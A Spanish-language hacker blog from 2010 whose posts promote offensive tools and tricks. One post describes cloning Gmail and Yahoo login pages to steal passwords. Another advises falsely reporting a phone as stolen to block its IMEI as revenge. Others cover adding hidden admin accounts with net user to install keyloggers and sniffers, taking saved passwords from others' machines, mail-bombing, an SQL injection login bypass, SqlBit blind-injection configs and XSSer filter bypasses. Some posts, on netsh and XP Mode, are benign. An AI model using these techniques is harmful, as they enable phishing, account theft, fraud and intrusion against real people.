miércoles, 8 de diciembre de 2010

Twitter Password Decryptor

Saludos Mundo Libre:

Ablemos de una nueva aplicacion que esta pegando duro y es Twitter Password Decriptor

TwitterPasswordDecryptor es la herramienta gratuita para recuperar instantáneamente las contraseñas cuenta de Twitter almacenados por los navegadores web más populares. La mayoría de los navegadores web almacenan las credenciales de inicio de sesión para sitios web visitados para que el usuario no tiene que recordar e introducir la contraseña cada vez. Cada uno de estos navegadores web, utilizan su propio mecanismo de encriptación propietario para almacenar las contraseñas de entrada incluyendo passwords.TwitterPasswordDecryptor cuenta de Twitter de forma automática se arrastra a través de cada uno de estos navegadores y al instante recupera todas las contraseñas almacenadas de Twitter.

TwitterPasswordDecryptor actualmente apoya la recuperación de la contraseña de la cuenta de Twitter almacenados siguientes navegadores más populares de Internet.
Internet Explorer (todas las versiones 4-8)
Firefox
Google Chrome
Opera Browser


Éstos son los aspectos más destacados de las características principales de TwitterPasswordDecryptor que lo hace diferenciarse de otras herramientas similares, incluidas las comerciales.
Al instante descifrar y recuperar contraseña cifrada almacenada cuenta de Twitter de populares navegadores web.


Viene con interfaz gráfica de usuario, así como la versión de línea de comandos.


Descubre automáticamente las solicitudes de apoyo de su respectiva ubicación de la instalación y recupera la contraseña de inmediato.


La función de clasificación para organizar la lista de contraseñas que aparecen por nombre de usuario y la contraseña que se facilita la búsqueda a través de 100 de las entradas.


Guarde la lista recuperada de la contraseña de Twitter a HTML / archivo de texto para la transferencia a otro sistema o para uso futuro.


Más fácil y rápido de usar con su interfaz fácil de usar mejor.


Completamente portátil herramienta que también viene con el instalador opcional para asistirle en la instalación y desinstalación locales.


Seguir leyendo aqui:

http://securityxploded.com/twitter-password-decryptor.php

Saludos Mundo Libre.

martes, 7 de diciembre de 2010

Modalidad Virtual XP

Saludos Mundo Libre.

Hoy Encontre un articulo sobre la movilidad virtual xp.

Usar La Modalidad Virtual De XP

Usar La Modalidad Virtual De XPWindows 7 viene con un soporte incorporado para ejecutar Windows virtual de XP. Esta es una característica fantástica para aquellos que deseen mantener XP o que tengan aplicaciones que no son compatibles con Windows 7 o Vista.


Requisitos Para La Modalidad XP


Compruebe la compatibilidad con SecurAble.
Procesador de 1 GHz 32-bit / 64-bit.
Memoria (RAM) – 1.25 GB se necesita pero recomendado 2 GB de memoria.
Recomendado 15 GB de espacio en el disco duro por cada ambiente de “Windows Virtual”.
Recuerde: La modalidad de Windows XP es solo disponible en “Windows 7 Enterprise”, “Windows 7 Professional”, y “Windows 7 Ultimate”.


Características De “Windows Virtual PC” Para La Modalidad Windows XP.


Una vez que se hayan instalado “Windows Virtual PC” y el ambiente del Windows virtual de XP, “Windows Virtual PC” proporciona un asistente simple para configurar la modalidad de Windows XP con un esfuerzo mínimo.
Usuarios pueden acceder sus dispositivos de USB que están adjuntos directamente a Windows 7 desde la modalidad de Windows XP. Estos dispositivos incluyen Impresoras y Escáneres, Memoria Flash/Lápices de Memoria y Discos Duros Externos, Cámaras Digitales y más.
Aplicaciones de publicación o inicio que estén directamente instaladas en la modalidad Windows XP desde el escritorio de Windows 7, como si estuvieran instaladas en Windows 7 mismo.
Accede sus “Known Folders” (Carpetas conocidas) de Windows 7 . “My Documents” (Mis documentos), “Pictures” (Imágenes), “Desktop” (Escritorio), “Music” (Mí Música), “Video” (Video), del ambiete de Virtual Windows, como la modalidad Windows XP.
Corte y pegue entre Windows 7 y la modalidad de Windows XP.
Imprima directamente con su impresora desde las aplicaciones de la modalidad de Windows XP en la modalidad de aplicaciones o de escritorio.
Para más información, haga clic aquí.


Instalar y Usar La Modalidad De “Virtual XP”

Para permitir el uso de la modalidad de “Virtual XP”, primero compruebe la compatibilidad, con SecurAble, si no le saldrá el aviso de error abajo:

1. Descargue Windows XP Mode and Windows Virtual PC (La Modalidad de Windows XP y “Windows Virtual PC”).
2. Instale Windows6.1-KB958559-x86.msu.
3. Reinicie su ordenador.
4. Instale VirtualWindowsXP.msi y acepte la“Default Settings” (configuración predeterminada).

Leer mas sobre el tema en:

http://www.cerocode.com/tutoriales/usar-la-modalidad-virtual-de-xp.html

viernes, 3 de diciembre de 2010

netsh

Saludos Mundo libre.

Hoy Voy ablar de una utilidad que windows trae es el comando netsh que sabiendolo aplicar podras tener acceso a una maquina para su control remoto.

Netsh

¿Cómo puedo configurar la configuración TCP / IP desde la línea de comandos?

Para configurar TCP / IP como la dirección IP, máscara de subred, puerta de enlace predeterminada, DNS y WINS direcciones y muchas otras opciones que puede utilizar Netsh.exe.

Netsh.exe es una utilidad de secuencias de comandos de línea de comandos que le permite, de forma local o remota, mostrar o modificar la configuración de red de un equipo que está ejecutando actualmente. Netsh.exe también proporciona una función de secuencias de comandos que permite ejecutar un grupo de comandos en modo por lotes en un equipo especificado. Netsh.exe También puede guardar una secuencia de comandos de configuración en un archivo de texto para fines de archivo o para ayudarle a configurar otros servidores.

Netsh.exe está disponible en Windows 2000, Windows XP y Windows Server 2003.
Windows vistas y Windows 7

Usted puede utilizar la herramienta Netsh.exe para realizar las siguientes tareas:

• Configuración de interfaces
• Configurar los protocolos de enrutamiento
• Configurar filtros
• Configurar las rutas
• Configurar el comportamiento de acceso remoto para los enrutadores de acceso remoto basado en Windows que está ejecutando el Servicio de enrutamiento y acceso remoto del servidor (RRAS) de servicio
• Visualización de la configuración de un router actualmente en ejecución en cualquier ordenador
• Utilice la función de secuencias de comandos para ejecutar un conjunto de comandos en modo por lotes en un enrutador especificado.

¿Qué podemos hacer con Netsh.exe?
Con Netsh.exe puede ver fácilmente la configuración de TCP / IP. Escriba el siguiente comando en una ventana del símbolo del sistema (cmd.exe):

netsh interface ip show config

Con Netsh.exe, que puede configurar la dirección IP de su ordenador y otros TCP / IP relacionados. Por ejemplo:

El siguiente comando configura la interfaz llamada Conexión de área local con la dirección IP estática 192.168.0.100, la máscara de subred 255.255.255.0 y puerta de enlace predeterminada 192.168.0.1:

netsh interface ip set address name="Local Area Connection" static 192.168.0.100 255.255.255.0 192.168.0.1 1

(La línea de arriba es una larga línea, copiar y pegar como una línea)

Netsh.exe puede ser también útil en ciertas situaciones tales como cuando usted tiene una computadora portátil que tiene que ser reubicados entre dos o más oficinas, mientras que todavía mantiene una configuración de dirección IP específica y estático. Con Netsh.exe, que puede guardar y restaurar la configuración de red adecuada.

En primer lugar, conectar el ordenador portátil al lugar # 1, y luego configurar manualmente los ajustes necesarios (tales como la dirección IP, máscara de subred, puerta de enlace predeterminada, DNS y WINS direcciones).

Ahora, es necesario exportar la configuración IP actual a un archivo de texto. Utilice el siguiente comando:

netsh -c interface dump > c:\location1.txt

Al llegar a lugar # 2, hacer lo mismo, sólo conservar la nueva configuración en un archivo diferente:

netsh -c interface dump > c:\location2.txt

Usted puede ir en cualquier otro lugar que pueda necesitar, pero vamos a mantenerlo simple y sólo usar dos ejemplos.

Ahora, cada vez que necesita para importar rápidamente la configuración de IP y cambiarlos entre la ubicación # 1 y # 2 lugar, introduzca el siguiente comando en una ventana del símbolo del sistema (cmd.exe):

netsh -f c:\location1.txt

O

netsh -f c:\location2.txt

y así sucesivamente.

También puede utilizar el mundial EXEC interruptor en lugar de-F:


netsh exec c:\location2.txt


Netsh.exe también se puede utilizar para configurar su tarjeta de red para obtener automáticamente una dirección IP de un servidor DHCP:


netsh interface ip set address "Local Area Connection" dhcp

¿Te gustaría configurar el DNS y WINS direcciones de la línea de comandos? Usted puede. Vea este ejemplo para DNS:


netsh interface ip set dns "Local Area Connection" static 192.168.0.200

y éste para WINS:


netsh interface ip set wins "Local Area Connection" static 192.168.0.200

O, si lo desea, puede configurar su tarjeta de red para obtener dinámicamente su configuración DNS:


netsh interface ip set dns "Local Area Connection" dhcp

Como usted ve, Netsh.exe tiene muchas características que pueden resultar útiles, y que va más allá de decir, incluso sin mirar a las otras opciones valiosas que existen en el comando.

Asi que disfrutenlo

Saludos Mundo libre.

jueves, 2 de diciembre de 2010

Sql InyeXion Scanner F-Security Team

Saludo Mundo Libre.

SQL injeccion

Exelente aplicacion en linea de injeccion SQL proporcionada por :
http://blackploit.blogspot.com y http://www.upperbasement.com/STMB/


Disfrutenla.

Saludos Mundo libre.

Serie de tu celular

Saludos Mundo libre.

He aqui una solucion para en caso de robo de tu celular o en caso de que alguien te caiga mal o te has peliado con tu novio o novia o ellos mismo te han rrobado tu email, facebook o lo que quieras.

El truco es muy sencillo agarra tu celular y marca lo siguiente

*#06# sin marcar Send. Aparece en el visor un código, este código es único (IMEI)

Lo grabamos en un papel o en lo quequieras guardarlo y ya esta solo hay que marcar al centro de servicio de la compania he inventa lo que quieras robo, perdida lo que te imaguines dale el numero de serie del celular y listo el celular queda desabilitado ahun cambiando el chip en su totalidad asi podras vengarte de esa persona o en caso de robo o perdida te puede servir.

Disfrutenlo felis Hacking.

Saludos mundo Libre.

OFERTA

Saludos Mundo libre.

Hoy estoy poniendo en oferta lo siguiente :

Acer aspire 3650
Funcionando todo, pero hay que arreglar el boton de invernacion

Apple ibook.
Falta bateria, cargador y tarjeta inalambrica.

Bateria para ibook
Modelo. M8416

Quemador de Cds externo Dell
Con conexion dual, usb y corriente.

Tarjeta inalambrica
2wire wifi.

todo se encuentra en exelente estado presio por lote $5000.00 pesos

OFERTAS EN

escuelahackerpuebla@yahoo.com.mx

miércoles, 1 de diciembre de 2010

Robo de Claves de email

Saludos Mundo Libre.

Hoy Quiero ablar de una tecnica que me esta funcionando muy bien esta tecnica es de ingenieria inversa y consiste en crear cuentas de email com nombres comunes como:

Administracion.@gmail.com
roo.t@gmail.com
u.ser@gmail.com
Backu.p@yahoo.com.mx

y un mundo de palabras relacionadas con las cuentas de email que llegan de los administradores de los servicios de email.

Recordemos en usar puntos para que podamos poner estos usuarios sino no funciona.

Yo He clonado las webs de los servicios de emails como gmail,yahoo,terra etc.
Solo hay que copiar el codigo y con unos cambios en el codigo para que se rregrese la clave del usuario.

Hay que poner un buen argumento para que la persona se trague la farza este truco es ya muy viejo y aun funciona.

Saludos Mundo libre.

Armitage

Saludos Mundo libre.

Hoy ablare de una herramienta exelente como complemento de las distribuciones de linux esta herramienta se llama Armitage:

Armitage es un ataque cibernético herramienta de administración gráfica para Metasploit que visualiza sus objetivos, recomienda hazañas, y expone las capacidades avanzadas del marco. Armitage tiene como objetivo hacer Metasploit útil para los profesionales de seguridad que comprenden la piratería, pero no el uso de Metasploit todos los días. Si usted desea aprender y crecer en Metasploit las características avanzadas, Armitage le puede ayudar.

Armitage organiza Metasploit las capacidades de todo el proceso de hacking. Hay características para el descubrimiento, el acceso, la explotación posterior, y manuver. Esta sección describe estas características en un alto nivel, el resto de este manual se refiere a estas funciones en detalle




Seguir leyendo y descarga.
Fuente:

http://www.fastandeasyhacking.com/manual

Video:

http://www.youtube.com/watch?v=EACo2q3kgHY&feature=player_embedded#!

Ya he testeado esta herramienta y la recomiendo facil de utilizar para aquellos que empiezan el arte del hacking.

Saludos Mundo libre.

martes, 30 de noviembre de 2010

kernel permite a atacantes evadir la seguridad de Windows UAC

Saludos Mundo libre.

Microsoft está investigando informes de una vulnerabilidad sin parche en el kernel de Windows que podrían ser utilizados por atacantes para eludir un sistema operativo importante medida de seguridad.

Peores momentos de la historia de seguridad de red

Una empresa de seguridad llamada el error un potencial "pesadilla", pero Microsoft minimizó la amenaza recordando a los usuarios que los hackers se necesita un segundo explotar para lanzar ataques a distancia.

El exploit se reveló el miércoles - el mismo día de prueba de concepto de código se hizo pública - y permite a atacantes evitar el User Account Control (UAC) en Windows Vista y Windows 7. UAC, que fue criticada con frecuencia cuando Vista debutó en 2007, muestra mensajes que los usuarios deben leer y reaccionar. Fue diseñado para hacer la instalación de software malicioso silencio imposible, o al menos más difícil.

"Microsoft es consciente de la opinión pública la publicación de detalles de una vulnerabilidad de elevación de privilegio que puede residir en el núcleo de Windows," dijo Jerry Bryant, gerente de grupo en el Microsoft Security Response Center, en un e-mail. "Vamos a seguir investigando el tema y, cuando se hace, nosotros tomaremos las medidas oportunas."

El error está en el "win32k.sys" archivo, una parte del núcleo, y existe en todas las versiones de Windows, incluyendo Windows XP, Vista, Server 2003, Windows 7 y Server 2008, dijo Sophos investigador Chet Wisniewski en un blog Jueves .

Varias empresas de seguridad, incluyendo Sophos y Vupen, han confirmado la vulnerabilidad e informó de que el código de ataque público a publicar trabajos sobre los sistemas que ejecutan Windows Vista, Windows 7 y Server 2008.

Los hackers no pueden usar el exploit de peligro de forma remota un PC, sin embargo, ya que requiere de acceso local, un hecho que Microsoft hizo hincapié. "Debido a que este es un local de la elevación de cuestión de privilegios, se requiere a los atacantes ya sea capaz de ejecutar código en una máquina específica", dijo Bryant.

"Por sí solo, este error no permitir la ejecución remota de código, pero no permitir que las cuentas que no son administradores ejecutar código como si se tratara de un administrador", agregó Wisniewski.

Aunque muchos usuarios de Windows XP, especialmente los de los consumidores y las empresas muy pequeñas, ejecute el sistema operativo a través de las cuentas de administrador, Microsoft agregó UAC de Vista y sistemas operativos posteriores como una manera de limitar los privilegios de usuario, y por lo tanto el acceso de malware en el PC.

Los atacantes se tienen que combinar la hazaña con otro código malicioso que se aprovecha de otra vulnerabilidad en el equipo - no necesariamente en Windows, pero en cualquier aplicación comúnmente instalados, tales como Adobe Reader, por ejemplo - para secuestrar un PC y bypass UAC.

"Esto permite explotar los malware que ya ha sufrido una caída en el sistema para eludir [UCA] y obtener el control total del sistema", dijo Prevx investigador Marco Giuliani en una entrada de blog el jueves que la empresa de seguridad.

Prevx informó la vulnerabilidad de Microsoft a principios de semana.

Fuente ingles:

http://www.networkworld.com/news/2010/112710-nightmare-kernel-bug-lets-attackers.html?source=nww_rss

Traduccion Dellcom1a.

Saludos Mundo Libre

Agregar prilegios de administrador a un usuario

Saludos Mundo libre.

Cuantas veses nos sentamos en una maquina y queremos instalar algun programa pero nos encontramos que no contamos con los privilegios de administrador o en un ciber la empresa donde trabajas para instalar algun vpn o un snnifer, Key Looger enfin un mundo de programas.

Ala carga:

En primer lugar, necesitarás del símbolo del sistema. Para ello "Tecla de Windows + R". A continuación, escriba "cmd" en el cuadro emergente.
A continuación, aparece con el comando negro del sistema.
Escriba "net user (usuario) contraseña \ añadir" Pero el cambio del (usuario) a lo que el nombre de usuario de la cuenta que desea y la contraseña a su contraseña. Puedo cambiar a tennsoccerdr.
Usted debe obtener una respuesta diciendo que lo ha creado con éxito.
A continuación, escriba "net localgroup Admninstrators (usuario) \ añadir"
y si todo sale bien esta listo.




Saludos Mundo Libre.

Backtrack4 R2

Saludos Mundo Libre.

No me canso de comentar de una a mi parecer una de las mejores distribuciones Bazadas en linux como backtrack4 ahora con su diestro R2 que ya se ha liberado para su descarga que cuenta con las siguientes mejoras:

* Kernel 2.6.35.8 – *Mucho* mejor mac80211 stack.
* Soporte USB 3.0.
* Nuevas tarjetas inalámbricas compatibles.
* Todos las parches de inyección inalámbrica aplicados, máximo apoyo para los ataques inalámbricos.
* Aún más *rápido* entorno de escritorio.
* Mejorado el medio ambiente Fluxbox para el desafiante KDE.
* Metasploit reconstruida desde cero, MySQL db_drivers trabajando fuera de la caja.
* Actualizados los viejos paquetes, agregados otros nuevos, y eliminados los obsoletos.
* Nuevo BackTrack Wiki con mejor documentación y apoyo.
* Nuestra más profesional, probada y optimizada versión nunca antes liberada.

Ademas la web ofrece:

Para aquellos que quieran actualizar una versión anterior de BT4, con apt-get update && apt-get dist-upgrade bastaria.

También nos complace anunciar el inicio de un nuevo BackTrack Wiki que cubre muchos aspectos importantes de BackTrack. Consigue tu nueva copia de BackTrack 4 R2 desde nuestra página de descargas . Si te gusta BackTrack y te gustaría donar a nuestro proyecto – por favor consulta nuestra página de la comunidad! Y como siempre, si usted está buscando la formación real de alta calidad de pruebas de penetración del mundo, echa un vistazo a nuestros cursos de Offensive-Security.

Asi que hay que apollar a nuestros amigos asiendo donaciones para que sigamos disfrutando de esta exelente distribucion linux.

Liga de descarga:

http://www.backtrack-linux.org/downloads/

saludos Mundo Libre.

martes, 16 de noviembre de 2010

Web

Saludos Mundo Libre

He aqui una exelente pajina web para textear tu IP encontrando agujeros con mucho mas aplicaciones una pajina que podemos utilizar a nuestro favor.

La liga es:

https://www.grc.com/x/ne.dll?bh0bkyd2

SpinRite ahora trae su legendaria de recuperación de datos y la magia de mantenimiento de unidad de los más avanzados sistemas de archivos, sistemas operativos, y los discos duros. Se corre mucho más rápido que nunca antes, pueden ayudar a mantener todas sus unidades en la mejor forma, se puede advertir de un desastre inminente, y luchar de datos de la muerte y las unidades de casi muerto. . . antes de que sea demasiado tarde.

SpinRite 6.0 está ahora disponible para la compra inmediata, la actualización y descarga. Esta herramienta de recuperación de datos estándar de la industria es independiente del sistema operativo, por lo que puede ser aplicado por los usuarios de Windows XP, 2000, Linux, y todas las demás Intel / AMD impulsa la plataforma PC-duros y sistemas de archivos.




Disfrutenla:

Saludos Mundo Libre.

lunes, 15 de noviembre de 2010

Aplicaciones portables

Saludos Mundo Libre

aplicaciones portátiles son aquellas que no requieren la instalación de un sistema para ser ejecutado. Se puede ejecutar directamente desde un dispositivo externo que le permite llevar todas tus aplicaciones favoritas con usted en una unidad. La Katana Kit de herramientas viene preconfigurado con más de un centenar de aplicaciones portátiles.

Katana Tool Kit: Portable Applications

Anti-Virus - Backup - Encryption - File System - Forensics
Media - Networking - Office - Password Recovery
Pen-Testing - Registry - System - Utilities

liga
http://www.hackfromacave.com/portableapps.html

Exelente Aplicacion.
Hay ocaciones o en mi forma de trabajar que es necesario traher consigo este tipo de aplicaciones para el hacktivista de echo son 8 las llaves que uso yo para mis cometidos asi que recominedo que empiesen acer sus llaves para los diferentes propositos y necesidades.

Saludos Mundo Libre

domingo, 14 de noviembre de 2010

Hacking MSN

Saludos Mundo Libre.

Ayer me han ablado para recuperar una cuenta de MSN bueno le explico ami amiga que para hackear una cuenta de MSN hay muchas formas.

La introduccion de un sniffer en tu pc via remota.
La ingenieria inversa para que la victima caiga.
y puedo seguir.

Ahora la mas comun y que no tiene nada que ver con un hacker es la de un lamer.

Un amigo o amiga que conoce todo de ti.
Tu novio que te esta asiendo la vida pesada.
Que te metieran un passwor view para recuparer el pasword desde tu maquina fisicamente

Asi que amiga tu cuenta fue hackeada desde el interior de tu circulo de amigos.

No todo esta perdido hay muchas formas de recuperarla .

Atacando su cuenta con mail bombers para su saturacion .
o ala hacker.

Lo podemos acer con mail password.

tendras que descargar estos tres archivos.

NK2Edit - Edit, merge and fix the AutoComplete files (.NK2) of Microsoft Outlook.
PstPassword - Outlook PST Password Recovery.
MessenPass - Recover the passwords of 'Instant Messenger' applications.
Dialupass - Recover VPN/RAS/Dialup passwords

Descripción

Mail PassView es una pequeña herramienta de recuperación de contraseña que revela las contraseñas y otros detalles de la cuenta para los clientes de correo electrónico siguiente:

Outlook Express
Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x (If the password is not encrypted with master password)
Mozilla Thunderbird (If the password is not encrypted with master password)
Group Mail Free
Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

Para cada cuenta de correo electrónico, los campos se muestran los siguientes: Nombre de cuenta, de aplicaciones, correo electrónico, servidor, Tipo de servidor (POP3/IMAP/SMTP), Nombre de usuario y la contraseña.

Si su programa de correo electrónico no es compatible con Mail PassView, aún puede recuperar su contraseña a través de este Sniffer Contraseña

Problemas conocidos
Falsa alerta de los problemas: algunos programas antivirus detectan Mail PassView utilidad como infectados con troyanos / virus. Haga clic aquí para leer más acerca de las falsas alarmas en los programas de antivirus



http://www.nirsoft.net/utils/mailpv.html

Saludos Mundo Libre

viernes, 12 de noviembre de 2010

Codigo de Inyeccion SQL

Saludos Mundo libre.

La seguridad en las aplicaciones se torna cada vez más compleja, con la presencia de técnicas que van desde la ingeniería social hasta ataques DoS, pasando por la sencilla inyección de código SQL. No se pueden imaginar la cantidad de aplicaciones que día a día crean los programadores con este fallo crítico.

¿En qué consiste la inyección SQL? Es una técnica de hackeo con un funcionamiento bastante simple. Se basa en atacar aplicaciones cuyo formulario de inicio de sesión o cuadros de texto no se encuentran validados completamente o de la manera adecuada.

Paso a ilustrarles un ejemplo, se necesita que tengan nociones de SQL.

Supongamos que tenemos una aplicación construida en PHP y MySQL, pueden instalarlo localmente si tienen WampServer, la cual tiene una página de inicio de sesión: login.php.

Ahora bien, login.php tiene dos campos de texto, uno para el usuario y otro para la clave. El del usuario tendrá name user y el de la clave tendrá name pass.

Los name son campos que sirven para identificar los inputs y recuperarlos desde la página a la cual es enviada la acción. El formulario sería algo así:

Usuario:
Clave:


Supongamos que al iniciar sesión aqui seremos redirigidos a una página de tipo index.php. Aquí es donde suelen haber errores. Comúnmente lo que hacen las aplicaciones aquí es recuperar el código de ésta manera:

$usua = $_POST['user'];
$clav = $_POST['pass'];Lo cual no tiene gran relevancia, si estamos usando un método POST en el formulario de login.php, pero lo que ocasiona el problema es el código que le sigue … éste:

$sql="SELECT * FROM usuarios WHERE user = '$usua' AND password='$clav'";Lo que hace esa sentencia es verificar que existe el usuario mediante la devolución de un registro completo (y único en teoría). Por ejemplo, suponiendo que nuestro nombre de usuario sea Pepe y nuestra clave sea pepito123, entonces la cadena sql quedaría de ésta forma:

$sql="SELECT * FROM usuarios WHERE user = 'Pepe' AND password='pepito123'";Aquí es donde entra la inyección SQL. No nos complicaremos mucho y comenzaremos con el clásico usuario vacío que valida todo y omitiremos la validación de clave. ¿Cómo? De la siguiente manera:

Usuario: ' or 1=1 --'
Clave: dsadsadas (da igual, escriban lo que sea, luego veremos por qué)

Al pasar estos valores por la cadena de validación SQL tendremos lo siguiente:

$sql="SELECT * FROM usuarios WHERE user = '' or 1=1 --'' AND password='dsadsadas'";En MySQL un — es el inicio de un comentario, por lo que todo lo que se encuentra luego de éste par de caracteres no se ejecutará, por lo que solo nos quedará:

$sql="SELECT * FROM usuarios WHERE user = '' or 1=1 ";Obviamente es improbable que se cumpla que exista nuestro usuario de login con nombre vacío (user = ''), sin embargo la segunda condición (1=1) siempre se cumple, por lo que podemos acceder a sistemas con bastante facilidad.

Evidentemente se exhiben cambios entre versiones de bases de datos y lenguajes de programación, por eso me tomé el trabajo de referirlos a un material bastante interesante que encontré en la web (enlace al final del post).

Esta hoja de referencia para inyección en SQL contiene códigos de guía para bases de dato Oracle, MySQL, SQL Server, PostgreSQL y lenguajes de programación como PHP, ASP, ASP.NET y Java, además de las diferentes combinaciones.

Se sorprenderán de la cantidad de aplicaciones que tienen vulnerabilidades que permiten inyección SQL en su formulario de login o inicio de sesión, ustedes no comentan los mismos errores. Yo mismo encontré problemas de este tipo en aplicaciones web de mi facultad como parte de un proyecto para mi curso de Seguridad Informática en la UNI.

jueves, 11 de noviembre de 2010

SqlBit

Saludos Mundo Libre.

SqlBit es una herramienta tambien Exelente que puede utilizar para ejecutar consultas arbitrarias en una base de datos MySQL y ver los resultados de la explotación de una vulnerabilidad de inyección SQL ciega en la aplicación web que utiliza esa base de datos. Extrae datos poco a poco. SqlBit puede ser descargado y utilizado libremente desde aquí.

http://stormsecurity.wordpress.com/2009/10/08/sqlbit-a-new-blind-sql-injection-exploiter/

Puede ejecutar SqlBit así:

perl sqlbit.pl “arbitrary SQL query”

Ejemplo:

perl sqlbit.pl “SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ “

Esta aplicación ha sido escrito en Perl para que pueda ejecutar en cualquier lugar que haya un intérprete de Perl (Windows, Linux, etc). Es totalmente personalizable mediante el uso de un config.txt archivo de configuración donde puede configurar muchos parámetros de la petición HTTP. El archivo de configuración se parece a esto:

HTTP_Method=POST
URL=http://www.vulnerabile-site.com/login.php
HTTP_VERSION=HTTP/1.1
Host=www.vulnerabile-site.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Paros/3.2.13
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Referer=http://www.vulnerabile-site.com/index.php
Cookie=PHPSESSID=776a2e7181af170e7d57f51773b9527b
Content-Type=application/x-www-form-urlencoded
Content-Length=21
param: user=j’ and ($SQL$) — ‘
param: password=xxx

Se puede ver que SqlBit requiere un lugar donde se puede poner una consulta SQL válida. Que ya debe probar que esta consulta es ejecutado con éxito. Este lugar debe ser especificado por la cadena de SQL $ $.

Eso es todo acerca de la funcionalidad de SqlBit. Si quieres saber más, aquí está una cierta información básica:

Durante algunos de mis pentests me encontré con vulnerabilidades de inyección SQL ciega. He intentado utilizar algunas herramientas que se suponía que los explotan, pero ninguno de ellos llegó a mis expectativas. Así que decidí escribir mi propia herramienta y aquí está.

Como usted ya sabe, ciego de inyección SQL es cuando usted no puede ver el resultado de una consulta, pero el fichero es ejecutado con éxito en el lado del servidor. Para instace:

httx://www.vulnerable-site.com/view.jsp?page=13′ limit 0 union select 1,2,3 from dual where 1 — ‘

Esto puede ser especificado en el archivo de configuración SqlBit como:

param: page=13′ limit 0 union select 1,2,3 from dual where $SQL$ — ‘

Si la dirección URL anterior produce el mismo resultado que la dirección legítima:

httx://www.vulnerable-site.com/view.jsp?page=13

puede ser que sea porque la página de parámetro no se filtra correctamente y que puede inyectar comandos SQL. Pero no siempre podemos ver la salida de nuestros comandos SQL debido a la lógica de la aplicación interna o por otros motivos.

En este caso podemos usar un ataque de tiempo que se basa en esta consulta MySQL:

SELECCIONE SI (expresión, verdadero, falso)

donde la expresión es una consulta que devuelve verdadero o falso. En el caso de verdad que puede dormir (de referencia) una cierta cantidad de tiempo, mientras que en el caso de falsa volvemos directamente. De esta manera podemos saber si un bit de datos es 0 o 1.

Mediante la automatización de las solicitudes, se pueden extraer datos de la base de datos poco a poco.

Fuente:

http://stormsecurity.wordpress.com/2009/10/08/sqlbit-a-new-blind-sql-injection-exploiter/

Saludos Mundo Libre

miércoles, 10 de noviembre de 2010

XSSER

Saludos Mundo Libre

Voy abler de una exelente herramienta de codigo abierto

XSSer es una herramienta de penetración de código abierto herramienta de prueba que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.

Contiene varias opciones para tratar de eludir los filtros de algunos, y diversas técnicas especiales de inyección de código.

forma de uso

./XSSer.py [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:


--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose verbose (default: no)
-s show statistics with all injection attempts responses
-w output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS output -final code- shortered (tinyurl, is.gd)
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
--check send a hash to pre-check if target repeats all content
recieved (usefull to reduce 'false positive' results)
--launch launch a browser at the end, with each 'positive'
final code injection(s) discovered

Seleccione el destino (s) :
Al menos una de estas opciones se debe especificar para establecer la fuente para conseguir objetivo (s) de urls. Usted tiene que elegir para ejecutar XSSer:

-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (duck, altavista,
bing, baidu, yandex, yebol, youdao, google, yahoo)

Seleccionar el tipo de HTTP / HTTPS conexión (s) :
Estas opciones se pueden utilizar para especificar qué parámetro (s) que desea utilizar como carga para inyectar código.

-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling (deeping level)

Configurar Solicitud (s) :
Estas opciones se pueden utilizar para especificar cómo conectar al objetivo (s) de carga útil (s). Puede seleccionar múltiples:

--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--retries=RETRIES Retries when the connection timeouts (default 3)

Seleccione el vector (s) :
Estas opciones se pueden utilizar para especificar un vector XSS código fuente para inyectar en cada carga. Importante, si usted no quiere tratar de inyectar un vector XSS común, usado por defecto. Elija sólo una opción

--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

Seleccione Bypasser (s) :
Estas opciones se pueden utilizar para codificar vector seleccionado (s) para tratar de eludir todos los filtros posibles anti-XSS en el objetivo (s) de código y algunas reglas IPS, si el objetivo de usarlo. Además, puede combinarse con otras técnicas para proporcionar codificación:

--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations
